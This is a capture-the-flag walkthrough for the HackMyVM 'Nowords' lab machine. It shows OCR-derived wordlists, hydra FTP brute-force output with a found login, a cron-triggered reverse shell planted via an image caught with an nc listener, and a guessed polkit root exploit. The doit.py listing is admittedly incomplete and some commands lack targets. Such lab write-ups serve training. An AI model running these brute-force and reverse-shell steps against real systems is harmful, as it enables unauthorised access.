HackMyVm Nowords Walkthrough (Ubuntu Polkit)


The main steps are below.

Nmap shows port 80 open; the hint is in index.html.

 ~ curl
 Hint inside.
 <!-- [usernames and passwords are lowercase] -->

Download robots.txt: it is not a text file but a PNG (`file robots.txt` confirms it) with some words drawn in it.

OCR the words (an online OCR service works), turn them into a wordlist, and brute-force paths on port 80 with it. Only one valid path turns up; download it and it is again a JPG with a list of words in it.

OCR that too, lowercase the first character of each word (the hint said usernames and passwords are lowercase) and build a second wordlist. Then brute-force FTP with it as both the user list and the password list:
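The wordlist step, as an added example that is not part of the original post: it takes the raw OCR text, strips OCR noise, and emits both the first-character-lowered form used above and the fully lowercased form the hint implies, deduplicated in order. The sample text is constructed for the example; the real list came from the JPG.

```python
import re


def ocr_wordlist(ocr_text):
    """Turn raw OCR output into candidate usernames/passwords.

    index.html says both are lowercase and the OCR'd image shows capitalised
    words, so each token yields two variants: only the first character
    lowered (the step taken in the walkthrough) and the whole token lowered
    (covers tokens OCR returned in mixed case). Order is kept and duplicates
    dropped so the hydra run stays small.
    """
    seen = set()
    words = []
    # keep only alphanumeric runs; OCR noise such as '|' or '.' is discarded
    for tok in re.findall(r"[A-Za-z0-9]+", ocr_text):
        for cand in (tok[0].lower() + tok[1:], tok.lower()):
            if len(cand) >= 2 and cand not in seen:
                seen.add(cand)
                words.append(cand)
    return words


def write_wordlist(words, path):
    """Write one candidate per line and return how many were written."""
    with open(path, "w") as fh:
        fh.write("\n".join(words) + "\n")
    return len(words)


if __name__ == "__main__":
    # constructed sample standing in for the OCR output of the JPG
    sample = "Sophie Natalia\nMarcus McKay\nNatalia.\n"
    n = write_wordlist(ocr_wordlist(sample), "pass2.txt")
    print(n, "candidates written to pass2.txt")
```

Feed the resulting file to hydra as both `-L` and `-P`, as done below; with 76 candidates that is 76 x 76 = 5776 attempts, which matches the hydra banner.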

 ~ hydra -L pass2.txt -P pass2.txt -t 64 ftp -f
 Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
 Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-07-06 12:55:22
 [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
 [DATA] max 64 tasks per 1 server, overall 64 tasks, 5776 login tries (l:76/p:76), ~91 tries per task
 [DATA] attacking
 [21][ftp] host:   login: sophie   password: natalia
 [STATUS] attack finished for (valid pair found)
 1 of 1 target successfully completed, 1 valid password found
 Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-07-06 12:56:28

Logged in to FTP as sophie, the whole filesystem is browsable. /home/sophie holds command.jpg and log.txt.

/home/me holds doit.py:

 ~ cat doit.py
 # coding: utf-8
 import pytesseract
 import os
 try:
     import Image, ImageOps, ImageEnhance, imread
 except ImportError:
     from PIL import Image, ImageOps, ImageEnhance
 def solve_captcha(path):
     # OCR the image and return the recognised text as-is
     captcha = pytesseract.image_to_string(Image.open(path))
     return captcha
 if __name__ == '__main__':
     text = solve_captcha("/home/sophie/command.jpg")
     a = text.split("\n")
     f = open("/home/sophie/log.txt","w")
     f.write(" Executing: "+text)
     f.close()

The script OCRs /home/sophie/command.jpg and writes the recognised text to log.txt. The listing as copied here stops at that write (a is split but never used, os is imported but unused), so the line that executes the text is missing from it; the box does run the recognised command from a cron job, as the shell below shows. Whatever is written as text in command.jpg therefore gets executed.

So render a reverse-shell one-liner as text in a command.jpg and upload it to /home/sophie over FTP.

Wait a minute for cron to fire and the reverse shell comes back:

 ~ nc -nlvp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on
 Ncat: Connection from
 Ncat: Connection from
 bash: cannot set terminal process group (136083): Inappropriate ioctl for device
 bash: no job control in this shell

Root comes from the Ubuntu polkit vulnerability. The post does not name a CVE; given its July 2021 date, the polkit privilege-escalation bug published the month before, CVE-2021-3560, is the likely one, but that is my inference. Check the installed version with `pkaction --version` before trying it.

Check the PoC here.



